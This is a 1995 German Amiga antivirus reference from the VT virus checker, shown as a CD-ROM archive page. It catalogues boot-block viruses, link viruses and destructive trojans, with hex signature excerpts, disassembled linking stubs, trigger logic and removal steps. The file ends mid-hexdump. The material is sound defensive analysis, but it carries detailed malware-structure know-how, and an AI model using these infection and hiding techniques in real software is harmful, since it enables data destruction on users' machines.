Fresh Fish 10

home *** CD-ROM | disk | FTP | other *** search

/ Fresh Fish 10 / Fresh_Fish_10_2352.bin / new / util / virus / vt / vt.dokumente / vt.kennt_a-k < prev next >

Wrap

Text File | 1995-08-13 | 347KB | 7,162 lines

************************************************************* * * * In eigener Sache: * * Ich, Heiner Schneegold, habe als Programmierer von VT * * NIE irgendwelche Rechte am Programm oder an den Texten * * aufgegeben. * * Deshalb lege ich fest: * * VT und/oder VT-Texte duerfen weder ganz noch teilweise * * auf einer SHI-SUPERKILLER-Disk oder einer anderen von * * SHI herausgegebenen Disk veroeffentlicht werden. * * Begruendung: * * Trotz mehrmaliger Bitten um Abhilfe hat die Leitung von * * SHI Icons ("kranker Computer") von VT abgeaendert, Pro- * * grammteile und/oder Texte weggelassen. Dies entspricht * * weder meinen Vorstellungen noch dem Freeware-Gedanken. * * Eibelstadt, 17.12.93 * * Heiner Schneegold * * * ************************************************************* VT2.75 kennt_A-K: ================= (oder sollte erkennen) Stand: 30.07.95 - bitte lesen Sie zuerst VT.LiesMich. Danke ! - Serienersteller und PD-Haendler sollten vorher Kontakt mit mir aufnehmen !!! Heiner Schneegold Am Steinert 8 97246 Eibelstadt Deutschland Tel. 09303/99104 (bitte nur 19.00 - 20.00 Uhr) Hinweis 15.05.94: Viele BB-Viren nehmen KEINE Ruecksicht auf das FileSystem. Also auch auf eine Disk mit FFS-Struktur (DOS1/3/5) wird ein DOS0-BB-Virus geschrieben. Beim Filetest mit VT wuerden dann nur bad.Data ange- zeigt. Dies sollten Sie als Hinweis nehmen, den Versuch mit einem FFS-BB zu wiederholen. ABER viel schlimmer. Falls Sie bei einer Disk mit falschem DOS-BB einen Schreibzugriff versuchen, muessen Sie damit rechnen, das die Disk-Struktur zerstoert wird !!!! Versuchen Sie nach diesem Fall einen FFS-BB zu installieren und fuehren Sie dann den Filetest noch einmal durch. Wenn nicht zu viele Files defekt sind, koennen Sie auch mit Disksalv einen Rettungsversuch unternehmen. Hinweis 10.05.94: Fordert trackdisk.device NICHT Das Virusteil greift auf das Device zu, das im Moment durch DoIo (Read, Write usw.) aktiv ist. Das kann auch ein Festplatten.device (scsi.device, gvpiscsi.device usw.) sein. Es wuerde also der Rigid.BB der HD zerstoert. Nach dem naechsten Reset koennte dann von dieser Festplatte nicht mehr gestartet werden. Keine schlechte Idee waere es, Zylinder 0 der HD mit VT in zeige Zyl. herauszusichern, der sich mit LW-info einen Ausdruck vom Aufbau der HD zu beschaffen. Dann waere es im Fall eines Falles mit der HD-ToolBox von Commodore moeglich, die HD neu aufzubauen, wenn nur der Rigid-Bereich vom Virus-Teil zerstoert worden ist. Hinweis 26.07.93: Sollte beim Test HARDLink oder SOFTLink auftauchen, so handelt es sich weder um einen Virenbefall noch um einen Cruncher, sondern um den Hinweis auf eine Routine des Betriebssystems. Nachzu- lesen bei VT2.xyd am Ende von FileTest. Hinweis 10.10.93: Bei aelteren BBen kann es vorkommen, dass VT "unbe- kanntes Programm", "Resstruc ungerade", "Resstruc leer" ausgibt. Dies ist KEIN Fehler von VT, sondern liegt daran, dass der Speicher fuer das Virusteil NICHT mit allocmem als belegt gekennzeichnet wird bei der Installierung im Speicher. Manche BB sind wenigstens noch soweit, dass sie nach einem RESET den Speicher anmelden. Bei 1MB ist nun die Gefahr gross, das ein Programm z.B. VT das Virusteil ueberschreibt. Eine Vermehrung ist dann natuerlich auch nicht mehr moeglich. ABER !!!! Der KickTag-Zeiger, Cool-Zeiger oder Cold-Zeiger bleibt ja verbogen (geschuetzt in ExecBase). Also ueberprueft VT die Vektoren, findet nichts passendes dazu und gibt deshalb obengenannte Warnungen aus. Die gleichen Viren (z.B. SCA ) werden mit 5MB Speicher SICHER erkannt im Speicher. Im BB MUSS VT diese Viren IMMER finden, da es hier kein Speicherproblem gibt. Im schlimmsten Fall kann es mit nur 1MB CHIP und KEIN Fastmem zum GURU kommen, wenn das Virusteil seinen Speicher nicht anmeldet und z.B. DoIo verbiegt. VT ueberschreibt dann schon beim Laden den "Virusspeicherbereich", zerstoert den DoIo und dies fuehrt zu einem GURU. Dies hat NICHTS mit VT zu tun, sondern kann mit anderen gros- sen Programmen genauso nachvollzogen werden !!!!! - bekannte Viren (die ich habe): ============================== Test auf mind. drei Langworte im Speicher Kein FastMem heisst, dass das VirusPrg mit FastmemKarte bei mir abstuerzt, koennte aber mit $C00000 oder einer anderen FastMemKarte laufen ???? - *-Filename KEIN Virus !!!!!!! Der Filename besteht nur aus einem * und die Filelaenge ist meist Null. Sollte nur auf uralten PD-Disks auftauchen. Dieses File ent- steht durch die Fehlfunktion eines uralten Prgs, das dann auch im C-Verzeichnis zu finden sein sollte. Sie sollten diese *-Files loeschen, da das * bei einigen DOS-Funktionen ein Fehlverhalten ausloesen kann. Wer es nicht glaubt, moege bitte eine solche Disk in der ORIGINAL Commodore- AmigaShell kopieren. Verwenden Sie bitte den Befehl: copy df0: df1: all (Return) Na sind Sie von dem Ergebnis ueberrascht ?? - 3c(a7)-Link Diese Variante ist im Dez. 93 aufgetaucht. Die Routine ist keine Neuentwicklung, sondern wurde von Packern abgeschaut. Da sich VT nicht sicher ist, bietet das Programm nur weiter an. Bei einigen Programmen - die ich habe (Dotty-MAFIA-Inst.) -, bietet VT loeschen an. Alle mir bekannten Links (Stand Jan 94) verwenden im Programm absolute Speicheradressen, die normal nur auf wenigen Rechnertypen vorhanden sind. Also nach meiner Meinung keine zu grosse Gefahr. - 3E8-Hunk 3F0-Hunk 3F1-Hunk WICHTIG WICHTIG WICHTIG WICHTIG WICHTIG WICHTIG WICHTIG 99% der von VT erkannten Hunktypen werden NICHTS mit einem Virus zu tun haben !!! Also bitte, die Aussage "3E8-Hunk=Virus" ist MEIST FALSCH !!! WICHTIG WICHTIG WICHTIG WICHTIG WICHTIG WICHTIG WICHTIG Die obengenannten Hunktypen sind fuer den Programmablauf nicht notwendig. Ehrliche Programmierer verwenden diese Hunks, um z.B. mit Kontrollstrukturen den sauberen Ablauf ihres eigenen Programms auszutesten. Andere Programmierer legen in einen Hunktyp die Versions-Nummer. Also alles in Ordnung. Wieder andere Programmierer versuchen durch diese Hunktypen am Fileanfang, einen Virus-Link zu verhindern, da die meisten Link- Viren auf $3E9 geprueft haben. TUT MIR LEID. DIESE ZEITEN SIND VORBEI. Neuere Viren koennen diese Hunktypen am Fileanfang ueber- springen. Einige Negativbeispiele: Dark Avanger 3E8, 3F0, 3F1 BURN-Virus 3F1 MENEM'S REVENGE 3E8, 3F0, 3F1 FileGhost-2 3E8, 3F0, 3F1 FileGhost-3 3E8, 3F0, 3F1 usw. ABER ABER ABER !!! Es sind mindestens zwei Shareware-Programme bekannt, die auf Mausklick VOR ein bestehendes Programm z.B. einen 3E8-Hunk haengen. Dies nutzen nun seit Dez. 93 einige weniger nette Zeitgenossen aus, um ihr Virusteil zu verstecken. Da die Filestruktur veraendert wird, kann es Probleme fuer Antivirusprg.e geben, obwohl das Virus- teil UNVERAENDERT, also ohne 3E8-Hunk erkannt werden wuerde. Testablauf: Falls VT diese Hunktypen an einem File erkennt, brechen Sie bitte den Scan-Vorgang ab. Kopieren Sie das File ins RAM: oder auf eine leere Disk. Gehen Sie danach in den VT-Filerequester. Klicken Sie das File an. Klicken Sie auf Convert. (Ja, ich war zu faul, dafuer ein eigenes Gadget zu opfern). VT sollte nun den Hunk ausbauen und das File neu abspeichern. moegliche Fehlermeldungen: - nichts Bekanntes (es ist gar kein 3E8-Hunk) - Fehler (VT findet keinen Anschlusshunk oder das File ist irgendwie beschaedigt) Da inzwischen ein File mit einem 3E8-Hunk UND einem 3F1-Hunk am Anfang aufgetaucht ist, muessen Sie den Ausbau (convert) halt wiederholen !!!! Danach klicken Sie bitte im Filerequester auf FileTest: - nichts Bekanntes (hoechstwahrscheinlich kein Virusteil aber nicht sicher. Es tauchen immer wieder neue Viren auf.) - VT erkennt ein Virusteil - VT erkennt einen Packer (Hier sollten bei Ihnen IMMER die Alarmglocken anschlagen.) Entpacken Sie das File mit dem entsprechenden Packer. Mit etwas Pech werden Sie dann mit VT oder einem Filemonitor ein Virusteil erkennen. Hinweis: Auf der Fish-CD Dez93 (Auslieferung Mitte Jan 94) findet VT mehrere 3F1-Hunks. Die betroffenen Programme wurden nach RAM: kopiert und ueberprueft. Sie sind ALLE sauber. Die Aussage gilt NUR fuer diese CD !!!! Nachtrag Feb. 94: Es haben mich inzwischen Anrufe erreicht, dass nach dem Ausbau von 3F1-Hunks das Programm nicht mehr lauffaehig sei. Da ich solche Tricks befuerchtet habe, koennen Sie diese Hunks ja auch nicht im Filetest ausbauen, sondern muessen in den VT-Filerequester gehen und mit dem Gadget "Convert" arbeiten. Also BITTE kopieren Sie solche Files auf eine leere Disk, aktivieren Sie Convert UND (!!!!!!!) ueberpruefen Sie dann die Lauffaehigkeit des ver- kuerzten Programms. Es scheinen sich viele Spieleprogrammierer NICHT (!!!!!!) an die Vorgaben von Commodore fuer den 3F1-Hunk zu halten. Ich habe das noch einmal mit 3F1-Hunks auf der Fish-CD probiert. KEIN Programm enthielt einen Virus und sie waren nach dem Ausbau LAUFFAEHIG !!!!! Negativbeispiel: Anruf wegen dpaint IV AGA (wenn ich es richtig verstanden habe): 3F1-Hunk von dpaint entfernt. Programm aus cli gestartet. Meldung: dpaint nicht gefunden 3F1-Hunk von dpaint modifiziert. Programm aus cli gestartet. Meldung: dpaint falsch installiert Also: Bitte, Bitte arbeiten Sie bei 3F1-Hunks mit einer KOPIE UND ueberpruefen Sie die LAUFFAEHIGKEIT. Danke Nachtrag Maerz 95: Es sind inzwischen Files mit 3E8-Hunk am Anfang aufgetaucht und dahinter dann gepackte Teile. Falls also VT nach 3E8-Hunk Ausgabe zusaetzlich noch z.B. Powerpacker ausgibt, dann sollten bei IHNEN die Alarmglocken laeuten. Da versucht jemand etwas zu verstecken. UNBEDINGT nachpruefen !!!! vgl. auch Cop Typ B u C siehe unten - 3E8-HiS-Hunk 00000001 000004ae 00000647 000003e8 ...........G.... 00000001 48695300 000003e9 000004ae ....HiS......... Es koennte sich um ein prg. handeln, das mit einem Pascal-Com- piler erzeugt wurde. Versuchen Sie z.B. mit PP einen Ausbau und ueberpreufen Sie die Lauffaehigkeit. Die Programme sollten danach immer noch laufen, da genuegend Pascal-Prge. bekannt sind, die diesen UNNOETIGEN 3E8-Hunk NICHT haben. Der Pro- grammierer raubt Ihnen auf ihrem Speichermedium SINNLOS Platz. - 3E8-*Art-Hunk Dieser 3E8-Hunktyp wurde mehrmals vor Viren gefunden (z.B. COP-DOpus usw.). Aber es MUSS sich NICHT IMMER ein Virus da- hinter verstecken !!!!!!!!!! 0000: 000003f3 00000000 00000002 00000000 ................ 0010: 00000001 0000009e 00020fb7 000003e8 ................ 0020: 00000001 2a417274 000003e9 0000009e ....*Art........ Moeglichkeit a: Es gibt ein Utility-Prg., das immer einen 3E8-Hunk mit diesem Text (*Art) erzeugt. (Kenne ich NICHT) Moeglichkeit b: Ein Virenprogrammierer verwendet dieses Teil zum Selbstschutz und/oder zur Kennzeichnung "seiner Viren". - 3F1-HEADDBGV-Hunk 00000000 00000033 000003f1 0000000c .......3........ 0039d25b 48454144 44424756 30310000 .9.[HEADDBGV01.. Dieser 3F1-Hunk am Fileanfang scheint MEIST ausbaubar zu sein, ohne die Lauffaehigkeit des Programms zu verhindern (aber nicht immer). Fertigen Sie bitte vor Ausbau eine Kopie an. Getestet wurde dies mit einigen Files (z.B. lawbreaker). Nachtrag Mai 94: laut Tel.-Auskunft erzeugt zum Beispiel Dice reg. so einen 3F1-Hunk. Aber bitte: Was sollen ein Hunk-Debug oder Hunk- Symbol in einem Prg., das veroeffentlicht wird. Diese Hunks sind fuer den Endanwender NUTZLOS, verlaengern nur unnoetig das Programmfile und rauben Ihnen auf ihrem Speichermedium SINNLOS Platz. Nachtrag Nov 94: Wenn Sie mit VT/Sp->File->Sp/Convert nicht arbei- ten wollen, dann verwenden Sie im PowerPacker in der Menueleiste Hunklab. Ein Beispiel: xpkarchive.library V1.0 vor Ausbau: 44008 nach Ausbau: 13328 Wenn das nicht eine UEBERFLUESSIGE Platzverschwendung ist ??? - 3F1-X-Fucker-Hunk EIN Virus !!!!!! Lesen Sie bitte nach bei X-Fucker 0000: 000003f3 00000000 00000001 00000000 ................ 0010: 00000000 00000411 000003f1 00000003 ................ 0020: 2f582046 75636b65 72000000 000003e9 /X Fucker....... - 4711-Virus Saddam-Disk-Validator-Clone s.u. - 4EAE-Virus siehe bei B.E.O.L.-LVirus - $4EB9-Link ?? Fileauszug: 0000: 000003f3 00000000 0000000d 00000000 ................ 0010: 0000000c 00000004 00000014 00000630 ...............P 0020: 400000cc 00000001 0000007c 0000042a @..............+ 0030: 00000486 00000014 000026d8 0000007c ..........&..... 0040: 000013aa 00000923 000003e9 00000004 .......#........ 0050: 4eb90000 00004eb9 00000000 70004e75 N.....N.....p.Nu 0060: 000003ec 00000001 00000001 00000002 ................ 0070: 00000001 00000008 00000008 00000000 ................ 0080: 000003f2 000003e9 00000014 48e7ffff ............H... Diese Struktur taucht in letzter Zeit immer haeufiger im Zusam- menhang mit gelinkten Viren auf. Bei den Viren handelt es sich in der Regel um "alte" Teile, die aber nicht erkannt werden koennen, da die Testlangworte an einer anderen Stelle liegen. Vermutlich wurde die Struktur von einer Szene-Gruppe entwickelt, um ein Intro vor ein Programm linken zu koennen. Diese Struktur wird nun abgekupfert (oder es existiert sogar ein Programm dafuer ??). Also BITTE, BITTE nicht bei jedem $4eb9 sofort loeschen, sondern nachdenken und das File erst auf eine andere Disk kopieren. Der groesste Teil der gefundenen Programme wird wahrscheinlich der Szene zuzuordnen sein, d. h. das Spiel wird nach dem Loeschen NICHT mehr laufen. Bitte helfen SIE mit, die Virus-Programme her- auszufiltern und schicken Sie die Programme bitte an mich. Wenn es geht mit Tel. Nr. . Ich rufe dann zurueck, sobald ich das Teil entschluesselt habe. Ich sichere noch einmal zu, dass sowohl Telefonnummern als auch Adressen nach Erledigung der Arbeit in den Abfalleimer wandern. Struktur: Ab $84 beginnt das gelinkte Virus-Teil Ab $48 beginnt der Ausloeser-Hunk. Er ist sehr kurz (4) und enthaelt nur 2 Sprungbefehle jsr ($4EB9), moveq 0,d0 (7000) und ein rts (4e75). Danach folgt ein Reloc-Hunk fuer die jsr-Befehle. Ablauf: Der 1. jsr-Befehl installiert das Virus-Teil und kehrt zurueck. Der 2. jsr-Befehl fuehrt das Nutzprogramm aus und kehrt nach Be- endigung des Programms zurueck. Danach wird d0 geloescht und mit rts das ganze File beendet. So einfach ist das. Hinweis 07.06.93: Es sind auch 4EB9-Links aufgetaucht, bei denen das Virusteil mit dem 2. jsr-Befehl installiert wird. ALLE angelinkten Virenteile waren gepackt, wohl um Reloc-Probleme zu minimieren. HINWEIS ab VT2.54 : Sie koennen jetzt im File-Requester Teil 1 oder 2 abschalten. Link1aus - schaltet den Programmteil 1 ab. Link2aus - schaltet den Programmteil 2 ab. Dies kann natuerlich nur ein NOTNAGEL sein. Besser ist es, wenn Sie mir das verseuchte Teil zuschicken und noch mehr erleichtern Sie mir meine Arbeit, falls Sie zufaellig das Programm auch im ungelinkten Zustand besitzen. Bitte fertigen Sie sich von dem gelinkten Programm zwei ver- schiedene Namenskopien auf einer sonst leeren Disk an. Schalten Sie danach an Kopie 1 den Link 1 ab und an Kopie 2 den Link 2 ab. Wenn Sie Glueck haben, ist ein lauffaehiges Programm dann ohne Virusteil oder ohne Intro !! Aber !!! Es ist auch moeglich, dass das Haupt-Programm NICHT mehr laeuft. Warum ? Beispiel: Eine Gruppe hat ein Intro vor ein Spiel gelinkt. Dann koennen in diesem Intro schon Veraenderungen am Computer (FastRam ab- schalten usw.) vorgenommen werden, die das Spiel voraussetzt. Ohne das Intro ist das Spiel dann logischerweise nicht lauf- faehig. Beispiele sind bekannt !!!! MERKE: Ein File mit abgeschaltetem LINK gibt man NICHT weiter!!! Hinweis 28.06.93 : Das Erzeugerprogramm fuer den $4EB9-Link scheint gefunden zu sein. Ein Programm mit Namen: Chain V0.23 Danke fuer den Hinweis Hinweis 24.09.93: Es soll eine neue 4EB9-Variante aufgetaucht sein. 46696c65 2d636861 696e2069 6e636c75 File-chain inclu 64696e67 3a20006d 656e7500 77640000 ding: .menu.wd.. 000003e9 00000007 48e7fffe 4eb90000 ........H...N... 00004cd7 7fff4eb9 00000000 4cdf7fff ..L..N.....L.. 70004e75 000003ec 00000001 00000001 p.Nu............ Das neue 4EB9-Erzeugerprogramm wird noch gesucht. Sie koennen im File-Requester Teil 1 oder 2 abschalten. Bitte lesen Sie ein paar Zeilen weiter oben nach. Nachtrag 04.94: Das Erzeuger-Programm scheint gefunden zu sein. File-Chainer V1.3 Danke fuer den Hinweis . - $4EB9-RTS-Link ?? Fileauszug: 0000: 000003f3 00000000 00000008 00000000 ................ 0010: 00000007 00000004 00000001 0000001e ................ 0020: 00000032 00002215 00000080 00000e20 ...2.."........ 0030: 00000940 000003e9 00000004 4eb90000 ...@........N... 0040: 00004eb9 00000000 70004e75 000003ec ..N.....p.Nu.... 0050: 00000001 00000001 00000002 00000001 ................ 0060: 00000002 00000008 00000000 000003f2 ................ 0070: 000003e9 00000001 42804e75 000003f2 ........B.Nu.... ^^^^ ^^^^^^^^ 0080: 000003e9 0000001e 48e7ffff 49fa005e ........H...I..^ Der erste gelinkte Hunk besteht nur aus einem Langwort und ent- haelt: 4280 clr.l d0 4e75 rts Dies sollte Sie nachdenklich machen. Da will jemand etwas ver- stecken. Versuchen Sie mit einem File-Hex-Editor den Anfang ab- zuschneiden. Wahrscheinlich werden Sie dann auf ein gepacktes File stossen. Dieses sollten Sie zur Sicherheit auch noch ent- packen. Notwendige Aenderungen mit Monitor in diesem Fall: 0050: 00000001 000003f3 00000000 00000006 0060: 00000000 00000005 0000001e 00000032 0070: 00002215 00000080 00000e20 00000940 0080: 000003e9 0000001e 48e7ffff 49fa005e Mit dem Editor ab $54 abspeichern. - $4EB9-$4EF9-Link ?? Fileauszug: 0000: 000003f3 00000000 0000000e 00000000 ................ 0010: 0000000d 00000005 00000089 000008d3 ................ 0020: 00000005 00000089 00000126 0000001d ...........&.... 0030: 0000e945 400000ac 00002085 40004485 ...E@..... .@.D. 0040: 0000007c 00008926 0000123a 000003e9 ...|...&...:.... 0050: 00000005 48e7fffe 4eb90000 00004cdf ....H...N.....L. 0060: 7fff4ef9 00000000 000003ec 00000001 .N............. Dis: 0054: 48E7 FFFE MOVEM.L D0-D7/A0-A6,-(A7) 0058: 4EB9 00000000 JSR L000001 005C: 4CDF 7FFF MOVEM.L (A7)+,D0-D7/A0-A6 0062: 4EF9 00000000 JMP L00002D Hinweis: Falls VT diese Struktur an einem File erkennt, kann das angelinkte Teil ein Trainer, ein Intro oder AUCH EIN Virus sein. Lesen Sie bitte dazu bei $4EB9-Link (oben) nach. Sie koennen jetzt im File-Requester an Files, die im FileTest als $4EB9-$4EF9-Link erkannt wurden, Teil 1 oder Teil 2 abschalten. Rest siehe oben Hinweis: Es wird das $4EB9-$4EF9-Link-Programm gesucht. Da Ende Nov 93 schlagartig mehrere solche Links aufgetaucht sind, vermute ich, das es dafuer ein Programm gibt. Nachtrag 04.94: Das Erzeuger-Programm scheint gefunden zu sein. ExeLink V1.1 Danke fuer den Hinweis . - $4EB9-4EF9-RTS-Link Fileauszug: 0000: 000003f3 00000000 00000004 00000000 ................ 0010: 00000003 00000005 00000001 00000083 ................ 0020: 00001ceb 000003e9 00000005 48e7fffe ............H... 0030: 4eb90000 00004cdf 7fff4ef9 00000000 N.....L..N..... 0040: 000003ec 00000001 00000001 00000006 ................ 0050: 00000001 00000002 00000010 00000000 ................ 0060: 000003f2 000003e9 00000001 4e750000 ............Nu.. ^^ ^^^^ 0070: 000003f2 000003e9 00000083 48e7fffe ............H... Der erste gelinkte Hunk besteht nur aus einem Langwort und ent- haelt: 4e75 rts Dies sollte Sie nachdenklich machen. Da will jemand etwas ver- stecken. Versuchen Sie mit einem File-Hex-Editor den Anfang ab- zuschneiden. Wahrscheinlich werden Sie dann auf ein gepacktes File stossen. Dieses sollten Sie zur Sicherheit auch noch ent- packen. Notwendige Aenderungen mit Monitor in diesem Fall: 0050: 00000001 00000002 000003f3 00000000 0060: 00000002 00000000 00000001 00000083 0070: 00001ceb 000003e9 00000083 48e7fffe Mit dem Editor ab $58 abspeichern. - $4EB9-Text-Link ?? An ein Programm wurde mit $4EB9 ein Text angelinkt, der im Cli mit Dos-Routinen ausgegeben wird. KEIN Virus !! VORSICHT !! VORSICHT !! VT versucht im Filetest einen Ausbau !!!!! Dieser Vorgang MUSS NICHT gelingen. Es kann sein, dass das Programm danach NICHT mehr lauffaehig ist. Fertigen Sie deshalb bitte VORHER eine Kopie an. Danke. Falls weitere derartige Anhaengsel bekannt sind, bitte ich um Zusendung. Am Fileanfang ist z.B. zu lesen: 20202020 542e442e 422e2046 524f4d20 T.D.B. FROM 4c454745 4e442120 50524553 454e5453 LEGEND! PRESENTS 204a5553 5420464f 52204655 4e210a0a JUST FOR FUN!.. ;usw. .... - $4EB9-Text-MausT ?? Nachtrag Maerz 94: Laut Telephonanrufen gibt es auch $4EB9-Text- Link-Files, die nur aus einer Gruppenmitteilung und dem Ab- fragen der linken Maustaste bestehen. Hier ist dann natuerlich ein Ausbau unsinnig. Loeschen Sie bei Bedarf das ganze File und aendern Sie dann auch s/startup-sequence ab. Bitte machen Sie aber VORHER eine Kopie der Disk. Sollte der Text die Aufforderung enthalten, eine andere Disk einzulegen, dann ist das Loeschen natuerlich nicht angebracht. Danke - $FFFFFFE9-Virus siehe bei B.E.O.L.-LVirus - .info anderer Name: TimeBomb V0.9 s.u. - 16 Bit Crew Cool, im Prg. noch DoIo, FastMem ja, im Speicher immer ab $7ec00 Vermehrung: ueber BB im BB steht unverschluesselt: The 16 Bit Crew 1988 - 16BIT-TAI8-Clone Nur Text geaendert: 00000000 000003f2 00000000 38543841 ............8T8A 3849382e 2e2e2e2e 00000000 00000000 8I8............. - 2001 SCA-Clone, Cool immer 7EC3E, nur anderer Text - 666!-Trojan Zerstoerungsfile Anderer moeglicher Name: WBPrefs Laenge ungepackt: 63140 Bytes Laenge CrunchManiagepackt: ?????? wird gesucht !!!! Keine verbogenen Vektoren Nicht resetfest Namensbegruendung: Ueberschreibt Medium mit 666! (s.u.) Gibt am Ende der Arbeit einen Bildschirm aus: - heller Hintergrund - graue Schrift sehr gross 666! Mit der li. Maustaste koennen Sie dann abbrechen. Laut Mitteilung soll am Anfang der startup-sequence stehen: SYS:C/WBPrefs Da kein User bereit ist, ein Zerstoerungsprogramm aufzurufen, ver- mute ich, dass es ein Install-Prg. gibt. Ich suche also dringend das Install-Prg. und WBPrefs crunchmania- gepackt. Ich bedanke mich schon jetzt fuer Ihre Mithilfe. Danke WBPrefs aus der startup-sequence gestartet, erstellt ein Prozess. Fileauszug von WBPrefs: 70144e75 646f732e 6c696272 61727900 p.Nudos.library. 616d6967 616c6962 2e70726f 63657373 amigalib.process Sinnvolles macht das File nicht. Dieser Prozess holt in gewissen Zeitabstaenden die Systemzeit (DateStamp-Struktur). Sobald dann die Systemzeit zwischen 5.00 und 8.00 Uhr liegt, wird diese Schleife verlassen. Wenn Sie eine richtig gehende Hardwareuhr haben, eine ungewoehnliche Zeit, aber SEHR gefaehrlich fuer Mailboxen. Wenn Sie keine Uhr im Amiga haben oder die Uhr verstellt ist, koennen Sie natuerlich auch um 16.00 Uhr (echt) eine Systemzeit von 6.00 Uhr haben. Danach: - ein Speicherbereich wird mit eori.b #$8E,d0 decodiert. Es ergibt sich S:HORSE Es wird nun versucht dieses File zu oeffnen. Falls ja, dann Programmende. Also wahrscheinlich ein Schutz fuer den Programmierer. - Ueber DosEnvec Test ob - Low-Zyl hoeher 0 - mehr als #22 Sektoren - oder mehr als #100 Zylinder - oder mehr als 2 Koepfe Falls nicht mindestens eine Bedingung erfuellt ist => Abbruch Das kommt Ihnen bekannt vor. Richtig: lesen Sie bei ModemCheck-Virus nach. Die gefunden Medien werden zerstoert. lZyl 0 Bl 0 0000: 36363621 36363621 36363621 36363621 666!666!666!666! 0010: 36363621 36363621 36363621 36363621 666!666!666!666! 0020: 36363621 36363621 36363621 36363621 666!666!666!666! Durch die Zerstoerungsroutine werden die Bloecke mit 666! aufgefuellt. Es gibt leider KEINE Rettung fuer das Medium. Es bleibt nur Format. Am Schluss wird noch eine Graphik ausgegeben. s.o. VT versucht den Prozess abzuschalten. GURU-Gefahr VT erkennt NUR das ungepackte File und bietet Loeschen an. Vergessen Sie bitte nicht die Zeile in der startup-sequence auch zu loeschen - A.H.C.-Virus BB nur KS1.3 immer ab $7FA00 Cool $7FAFE, DoIo 7FFB3E Sollte auch mit KS1.2 laufen. Leider hat der Superprogrammierer beim Nachbau $23FC mit $33FC verwechselt. Ja das Augenlicht !!! Ursprung: groessere Teile wurden bei Sherlock_Anti.BB abge- kupfert. Fordert trackdisk.device NICHT !!!! Namensbegruendung: siehe unten Schaeden: gibt immer wieder mehrere verschiedene Alert-Meldungen aus. siehe unten Vermehrung: BB Im BB ist zu lesen: 790005bc 2048656c 6c6f2c20 412e482e y... Hello, A.H. 432e2073 7065616b 696e6720 68657265 C. speaking here 21212120 20200050 32d02020 20505245 !!! .P2. PRE 53532052 49474854 20425554 544f4e20 SS RIGHT BUTTON 20200050 50b42020 466f7220 6120676f .PP. For a go 6f642046 75636b2e 2e2e2041 2e482e43 od Fuck... A.H.C 2e212020 00202020 20200000 05e62049 .! . .... I 606d2074 68652041 2e482e43 2e2d5649 `m the A.H.C.-VI 52555320 00505000 20202020 20202020 RUS .PP. 20202020 20202020 20202020 20204920 I 636f6e74 726f6c20 796f7572 20636f6d control your com 70757465 72212121 00505000 00000000 puter!!!.PP..... 002e1eb0 2045696e 20647265 69666163 .... Ein dreifac 68657320 4d69746c 65696420 66fc7220 hes Mitleid f.r 41746172 69535400 50330020 412e482e AtariST.P3. A.H. 432e2028 68616861 68612920 20202020 C. (hahaha) 20202020 20202020 20202020 20202000 . - A.I.S.F.-Virus File Laenge: 8708 Bytes Von der Definition kein Virus, da keine Vermehrung. Reines Zerstoerungsprogramm Speicher: immer ab $7F000 verbogener Vektor: $6c (Zeropage) Versucht durch die Anzeige einer Fensterleiste mit dem Titel Virus-Checker V6.72 zu taeuschen. Diese Version gibt es am 08.09.93 noch gar nicht. Die Leiste ist FUNKTIONSLOS !!! Ich vermute deshalb, das das Programm unter dem Namen Virus-Checker verbreitet wird. Ueberpruefen Sie bitte auch ihre startup-sequence. Namensbegruendung: (im File zu lesen) 72790000 56495255 532d4348 45434b45 ry..VIRUS-CHECKE 52205636 2e373200 62792041 2e492e53 R V6.72.by A.I.S 2e462e20 21212100 41000000 00000000 .F. !!!.A....... Schaden: Erhoeht ueber $6c eine Zaehlzelle. Sobald der Wert $50000 er- reicht ist wird eine Decodier-Routine ( EORI.B #$F7,(A0)+ ) an- gesprungen. Es ergibt sich: 4e710096 14212121 20435249 4d452044 Nq...!!! CRIME D 4f204e4f 54205041 59202121 21000100 O NOT PAY !!!... 7d2d5748 59204152 4520594f 55205357 }-WHY ARE YOU SW 41505049 4e472049 4c4c4547 414c2053 APPING ILLEGAL S 4f465420 3f000100 aa464245 43415553 OFT ?....FBECAUS 4520594f 55204152 45204120 4352494d E YOU ARE A CRIM 494e414c 20212121 21000100 d755414e INAL !!!!....UAN 44204245 20535552 453a0001 00966957 D BE SURE:....iW 45202841 2e492e53 2e462e29 2057494c E (A.I.S.F.) WIL 4c204745 5420594f 55202100 0100967d L GET YOU !....} 2841294e 54490001 00968728 4929494c (A)NTI.....(I)IL 4c454741 4c000100 96912853 29574150 LEGAL.....(S)WAP 50494e47 000100be a0284629 4f554e44 PING.....(F)OUND 4154494f 4e000100 beaa2d50 52455353 ATION.....-PRESS 204d4f55 53452054 4f20434f 4e54494e MOUSE TO CONTIN 55452d00 00000000 00000c0a 9b33336d UE-..........33m Dieser Text wird mit DisplayAlert ausgegeben. Sobald Sie die Maustaste klicken, beginnt der Laufwerkskopf zu steppen. Bitte tun sie das ihrem Laufwerk nicht zu lange an. Ein Tastatur- Reset hilft NICHT. Sie muessen den Computer ausschalten !!! In diesem File befindet sich noch mehr Muell. - AAA-Enhancer-Bomb Zerstoerungsprg. Laenge: 3984 Bytes KS2.04: ja KS3.0 : ja verbogener Vektor: DosWrite Resetfest: Nein Vermehrung: Nein Namensbegruendung: Fensterleiste: 5241573A RAW: 302F302F 3634302F 3230302F 4141412D 0/0/640/200/AAA- 456E6861 6E636572 20342E38 20627920 Enhancer 4.8 by usw. Taeuschtext: Im Fenster wird ein Text ausgegeben, in dem behauptet wird, dass dieses Prg. im A1200 und A4000 AAA-Chipset aktiviert. Nebenbei wird versucht, den Ruf von SHI zu schaedigen. Schaeden: Verbiegt DosWrite, sucht bei jedem Schreibzugriff nach Worten und Zahlen und versucht sie durch andere zu er- setzen. Wortdreher auch umgekehrt: perverse-reliable Computer-vibrator sexual-actual friend-bugger pocket-vagina follow stroke randy-ready blood-sperm bitch-woman head-hole rich-poor warm-cold open-lock love-hate meet-fuck lift-drop girl-wife kill-kiss look-piss nice-shit soft-hard ball-hand cock-nose dear-dead skin-cunt egg-lip car-ass Zahlendreher auch umgekehrt: 0-9 1-8 2-7 3-6 4-5 Waehrend die Wortdreher die Lauffaehigkeit kaum beeinflussen, wird durch die Umwandlung von $30 (0) in $39 (9) ein Programm zerstoert, da diese Hexwerte auch in Befehlsfolgen vorkommen. Als Beispiel steht unten der letzte Teil eines alten Echo-Be- fehls. Erstellung des zerstoerten Echo-Befehls: Ein DirUtility wurde geladen und der echo-Befehl von df0: nach df1: kopiert. echo orig: echo zerstoert: 340: 7420746f 20454348 t to ECH 340: 7420746f 